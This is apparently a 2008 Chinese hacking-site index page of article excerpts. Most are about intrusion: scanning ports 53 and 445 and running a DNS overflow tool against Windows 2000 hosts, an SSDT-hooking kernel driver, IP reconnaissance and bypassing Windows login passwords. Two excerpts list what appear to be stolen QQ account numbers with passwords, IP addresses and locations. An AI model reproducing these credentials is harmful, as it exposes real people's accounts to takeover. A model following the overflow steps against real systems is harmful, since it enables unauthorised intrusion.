2008-08-20 11:04
注入漏洞、上传漏洞、弱口令漏洞等问题随处可见。跨站攻击,远程控制等等是再老套不过了的话题。有些虚拟主机管理员不知是为了方便还是不熟悉配置,干脆就将所有的网站都放在同一个目录中,然后将上级目录设置为站点根目录。有些呢,则将所有的站点的目录都设置为可执行、可写入、可修改。有些则为了方便,在服务器上挂起了QQ,也装上了BT。更有甚者,竟然把Internet来宾帐号加入到Administrators组中!汗……!普通的用户将自己的密码设置为生日之类的6位纯数字,这种情况还可以原谅,毕竟他们大部分都不是专门搞网络研究的,中国 |
2008-08-20 11:03
前提是必须要开放53、445端口
1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。
2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示
1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。
3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上,
successfully bound to the vulner |
2008-08-20 11:03
大家知道直接使用ASP是不能够重启服务器的,这时我们需要制作一个组件来实现功能,ASP通过这个组件调用系统API,然后按照不同的重启和关机方式进行操作!
下面先说COM的制作,在VB中新建一工程,当然是AceiveX dll的!
1)先修改工程属性,在工程属性窗口将工程名称改为system,在类模块窗口将模块名称改为contral,保存工程 |
2008-08-20 11:02
案例:一个网站遭遇入侵,破坏相当严重,SQL数据库被挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞
没有办法,我只得修复数据库,因为他们没有数据库备份,根本就没有办法还原数据库啊,何况连事务日志都没有开启,试着恢复了几次都不成功,恢复数据库没有一点希望,我只得乖乖的帮他们清理挂马代码,不可能手工删除挂马代码,毕竟数据太大了,不可能去直接修改,通过四处搜寻得到了一个勉强有效的解决办法 |
2008-08-19 11:42
文章备注:atapi dispatch地址和SSDT列表的地址是通过Ring3动态获取然后写入驱动再重新校验,这里我加了自己的代码,改了下,Ring0下实现
复制内容到剪贴板
代码:
#include<ntddk.h>
#include<stdio.h>
ULONG * realssdt;
#define SEC_IMAGE 0x01000000
#pragma pack |
2008-08-19 11:33
850590734----16847003.96800----222.217.224.87----广西玉林市电信----2008-8-17----15:41:20
375220144----zhangfei521----221.234.240.28----湖北省武汉市电信ADSL----2008-8-17----15:01:08
596919005----13525375534.com----121.43.201.30----欧洲----2008-8-17----15:21:14
55882499----13134580309----123.15.5.165----欧洲----2008-8-17----15:32:50
791269715----965216----117.93.129.128----欧洲----2008-8-17----15:59:46
593652846----139316150----yangkun----218.23.1.170----安徽省宿州市(埇桥区) |
2008-08-19 11:13
17165707----00002597758----种子:0
26679338----hmilylb11----种子:0
64017771----wen42003----种子:0
22979833----allenchow----种子:0
61960872----miweipengaibohua----种子:0
78363881----linjing521----种子:0
89610891----zyloveyd----种子:0
55341840----aa81827882----种子:0
68274070----610158liqiang----种子:0
63557934----chenfei----种子:4
58800195----4211821986----种子:0
36003988----wangna12250828----种子:0
93609020----wanglianhang197----种子:\ |
2008-08-19 10:44
一.事情起因
那天满头大汗的把哥哥的电脑拿回来了。可是回到家一进入系统要密码,问了n次,密码都是错的。(忘记了)又加上我用usb键盘,用ghost系统盘破解破解程序时键盘无法使用无法进行破解,于是就有本文。
二.原理简介
Windows PE的全称是Windows Preinstallation Environment,即Microsoft Windows 预安装环境,是一个基于保护模式下运行的Windows XP Professional的工具,只拥有较少(但是非常核心)服务的Win32子系统。关键一个功能就是能够对原本系统盘中的文件进行操作。
后面又想起前段时 |
2008-08-19 10:44
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。
来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。
获取IP
“IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。 |
2008-08-19 10:43
SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions
/*动态文件名
declare @fn varchar(20),@s varchar(1000)
set @fn = 'c:\test.xls'
set @s ='''Microsoft.Jet.OLEDB.4.0'',
''Data Source="'+@fn+'";User ID=Admin;Password=;Extended properties=Excel 5.0'''
set @s = 'SELECT * FROM OpenDataSource ($'">'+@ |
|
| 
